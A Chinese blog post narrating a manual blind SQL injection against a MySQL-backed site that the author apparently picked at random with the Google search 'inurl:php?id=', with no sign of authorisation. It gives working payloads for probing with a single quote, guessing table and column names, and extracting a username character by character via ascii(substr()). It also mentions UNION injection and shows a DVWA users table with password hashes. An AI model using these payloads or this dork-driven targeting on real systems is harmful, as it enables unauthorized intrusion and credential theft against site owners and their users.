记一次手工注mysql经历


老办法,打开google搜一下,inurl:php?id=,抓来一个试试。。。。

单引号测试,果然有发现

错误类型为

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

用and (select count(*) from table)>0 %23测试吧

试试?id=8' and (select count(*) from user)>0 %23,看看是不是有user表,通常是admin,users之类的,果然猜到了

接下来猜测列名 ?id=8' and (select count(name) from user)>0 %23,也没报错,那就是有name这个字段了,同样的方法猜出password字段



接下来猜测name里面的数据,从第一位猜起,?id=8' and ascii(substr((select name from user),1,1))>114 %23,substr(str,start,length)为从哪开始取字符串,长度为length,

没报错,试试115

刚开始我以为也没报错,可是试到了128都没反应,原来是在115的时候已经错了,这时候的错误反应为重定向了主页面,url变成了index.php,所以第一个字符的ascii是115,也就是s,剩下的就是时间问题了,一共有四个字符,当substr((select name from user),5,1)开始设为第5个字符的时候又会重定向到首页,说明name字段结束了

ps:用ascii(substr((select * from someone),1,1))>xx 的时候如果要查询的字段有多条的话不适用,可以修改为ascii(substr((select columnname from database.tablename order by id 0,1),1,1))>xx,另一篇日记详细将这个姿势(推荐用这个姿势),还可以用union注入,例如users表中数据如下

+---------+------------+-----------+---------+----------------------------------+---------------------------------+

| user_id | first_name | last_name | user    | password                        | avatar                          |

+---------+------------+-----------+---------+----------------------------------+---------------------------------+

|      1 | admin      | admin    | admin  | 5f4dcc3b5aa765d61d8327deb882cf99 | dvwa/hackable/users/admin.jpg  |

|      2 | Gordon    | Brown    | gordonb | e99a18c428cb38d5f260853678922e03 | dvwa/hackable/users/gordonb.jpg |

|      3 | Hack      | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | dvwa/hackable/users/1337.jpg    |

|      4 | Pablo      | Picasso  | pablo  | 0d107d09f5bbe40cade3de5c71e9e9b7 | dvwa/hackable/users/pablo.jpg  |

|      5 | Bob        | Smith    | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | dvwa/hackable/users/smithy.jpg  |

+---------+------------+-----------+---------+----------------------------------+---------------------------------+

则回显

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 本周主要学习的事SQL注入相关的细节信息,包括数据库枚举方式,判定注入点的方式,注入形式等等,具体如下: 【一、判...
    快递_小哥阅读 4,955评论 0 1
  • 姓名:于川皓 学号:16140210089 转载自:https://baike.baidu.com/item/sq...
    道无涯_cc76阅读 6,030评论 0 2
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 10,447评论 0 9
  • 如何将小表放入keep池中? alter table xxx storage(buffer_pool keep);...
    一点也不想吃辣阅读 3,146评论 0 2
  • 注入攻击的分类 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传...
    查无此人asdasd阅读 5,713评论 0 5

友情链接更多精彩内容